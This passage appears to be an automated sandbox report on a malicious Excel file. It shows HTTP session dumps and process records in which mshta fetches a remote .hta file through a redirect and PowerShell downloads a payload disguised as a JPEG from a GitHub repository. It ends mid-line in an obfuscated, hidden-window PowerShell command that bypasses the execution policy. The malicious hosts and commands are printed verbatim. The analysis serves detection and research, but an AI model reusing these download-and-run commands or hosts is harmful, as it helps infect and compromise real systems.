                                                                                                                                                                              2024-10-14 09:06:03 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                                                                                                              Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                                                                                                                              2024-10-14 09:06:03 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                                                                                                              Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                                                                                                                              2024-10-14 09:06:03 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                                                                                                              Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                                                                                                              2024-10-14 09:06:03 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                                                                                                              Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              4192.168.2.2249170150.136.81.2484432764C:\Windows\System32\mshta.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-14 09:06:05 UTC446OUTGET /k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Accept-Language: fr-FR
                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                              Host: jfm.com.co
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-14 09:06:05 UTC451INHTTP/1.1 302 Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Mon, 14 Oct 2024 09:06:05 GMT
                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                              Content-Length: 89
                                                                                                                                                                              Connection: close
                                                                                                                                                                              X-DNS-Prefetch-Control: off
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                              X-Download-Options: noopen
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                              Location: http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta
                                                                                                                                                                              Vary: Accept
                                                                                                                                                                              2024-10-14 09:06:05 UTC89INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 34 30 2f 34 35 30 2f 65 63 2f 6e 65 74 77 6f 72 6b 74 68 69 6e 6b 69 6e 67 67 72 65 61 74 74 68 69 6e 67 73 74 6f 62 65 65 6e 6f 75 67 68 2e 68 74 61
                                                                                                                                                                              Data Ascii: Found. Redirecting to http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              5192.168.2.2249176185.199.108.1334433732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-14 09:06:19 UTC134OUTGET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1
                                                                                                                                                                              Host: raw.githubusercontent.com
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-14 09:06:20 UTC903INHTTP/1.1 200 OK
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Length: 6331693
                                                                                                                                                                              Cache-Control: max-age=300
                                                                                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              ETag: "c7af5123730da5215a9032249afad007dd54a2bf216bbf720e484463b4eebacd"
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-Frame-Options: deny
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              X-GitHub-Request-Id: 0C07:2DA33E:146EACB:16903B7:670CD329
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Date: Mon, 14 Oct 2024 09:06:20 GMT
                                                                                                                                                                              Via: 1.1 varnish
                                                                                                                                                                              X-Served-By: cache-nyc-kteb1890038-NYC
                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                              X-Cache-Hits: 0
                                                                                                                                                                              X-Timer: S1728896780.035999,VS0,VE1
                                                                                                                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                              X-Fastly-Request-ID: 62966c03b82212111a6ef6004252838a221785cc
                                                                                                                                                                              Expires: Mon, 14 Oct 2024 09:11:20 GMT
                                                                                                                                                                              Source-Age: 16
                                                                                                                                                                              2024-10-14 09:06:20 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                                              Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                                                              2024-10-14 09:06:20 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                                                                                                                              Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
                                                                                                                                                                              2024-10-14 09:06:20 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                                                                                                                              Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                                                                                                                              2024-10-14 09:06:20 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                                                                                                                              Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                                                                                                                              2024-10-14 09:06:20 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                                                                                                                              Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                                                                                                                              2024-10-14 09:06:20 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                                                                                                                              Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                                                                                                                              2024-10-14 09:06:20 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                                                                                                              Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                                                                                                                              2024-10-14 09:06:20 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                                                                                                              Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                                                                                                                              2024-10-14 09:06:20 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                                                                                                              Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                                                                                                              2024-10-14 09:06:20 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                                                                                                              Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                                                                                                                              Statistics

                                                                                                                                                                              CPU Usage

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Memory Usage

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                              Behavior

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              System Behavior

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:05:05:21
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                              Imagebase:0x13fc60000
                                                                                                                                                                              File size:28'253'536 bytes
                                                                                                                                                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:4
                                                                                                                                                                              Start time:05:05:43
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                              Imagebase:0x13fce0000
                                                                                                                                                                              File size:13'824 bytes
                                                                                                                                                                              MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:05:05:45
                                                                                                                                                                              Start date:14/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; 